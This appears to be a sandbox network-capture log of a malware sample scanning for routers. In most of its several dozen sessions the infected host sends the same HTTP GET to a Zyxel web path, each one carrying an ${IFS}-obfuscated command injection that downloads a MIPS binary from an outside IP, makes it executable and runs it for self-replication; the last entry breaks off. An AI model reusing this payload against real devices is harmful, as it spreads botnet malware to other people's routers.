                                                      6209192.168.2.1457126157.252.216.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.791949987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6210192.168.2.145096663.178.65.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.791985035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6211192.168.2.144157285.181.223.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792030096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6212192.168.2.143981837.219.246.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792064905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6213192.168.2.1454192167.255.148.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792094946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6214192.168.2.14554428.242.40.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792135000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6215192.168.2.1442334202.61.3.115443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792191029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6216192.168.2.1436210219.88.210.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792215109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6217192.168.2.145560412.132.92.119443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792256117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6218192.168.2.144434838.41.200.132443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792294979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6219192.168.2.1437918170.176.222.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792351007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6220192.168.2.1445060146.115.77.187443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792393923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6221192.168.2.1449388136.192.103.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792433977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6222192.168.2.1445000207.84.98.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792479038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6223192.168.2.144594681.153.110.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792551994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6224192.168.2.145531017.245.154.207443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792582035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6225192.168.2.143793060.242.214.133443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792637110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6226192.168.2.145481895.101.189.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792675018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6227192.168.2.144102644.67.216.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792716026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6228192.168.2.1435126107.217.101.251443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792742968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6229192.168.2.145774054.244.66.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792784929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6230192.168.2.1453428191.155.18.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792824030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6231192.168.2.143602882.186.130.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792881012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6232192.168.2.143409244.55.43.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792920113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6233192.168.2.1437948166.170.234.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792958021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6234192.168.2.1442620125.93.55.240443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.792992115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6235192.168.2.1439156148.156.133.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793045998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6236192.168.2.144529660.139.71.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793093920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6237192.168.2.1434242163.239.41.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793138027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6238192.168.2.143762667.193.63.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793181896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6239192.168.2.1438380119.213.38.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793221951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6240192.168.2.1459644170.9.81.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793256044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6241192.168.2.1443030188.183.44.56443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793279886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6242192.168.2.1434000196.185.194.190443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793330908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6243192.168.2.144836832.133.59.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793371916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6244192.168.2.1457442220.130.234.212443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793412924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6245192.168.2.143431099.9.177.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793431997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6246192.168.2.1434870140.233.176.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793478012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6247192.168.2.144485432.201.217.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793610096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6248192.168.2.144394263.163.179.158443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793642998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6249192.168.2.1438766130.195.80.163443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793682098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6250192.168.2.1436336105.150.224.139443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793716908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6251192.168.2.1452262188.213.120.111443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793765068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6252192.168.2.1439766162.22.205.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793811083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6253192.168.2.1445742179.77.242.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793862104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6254192.168.2.1457784149.123.27.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793883085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6255192.168.2.144524261.204.180.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793936968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6256192.168.2.1459952101.211.92.4443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.793965101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6257192.168.2.145502094.230.50.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794025898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6258192.168.2.1446198223.107.103.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794063091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6259192.168.2.144076453.109.165.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794097900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6260192.168.2.145635247.234.3.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794126034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6261192.168.2.14478488.108.194.74443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794173956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6262192.168.2.1454078184.72.41.20443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794225931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6263192.168.2.1441096220.194.218.196443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794246912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6264192.168.2.1441748144.117.216.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794289112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6265192.168.2.1439398108.110.15.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794342995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6266192.168.2.1457324174.168.159.2443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794389963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6267192.168.2.1453612212.86.22.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794414997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6268192.168.2.1455906125.152.220.170443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794476986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6269192.168.2.1457568130.247.9.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794507980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6270192.168.2.143788687.70.33.171443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794543028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6271192.168.2.1453322126.81.136.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:00.794579029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      6272192.168.2.143791031.131.34.156443
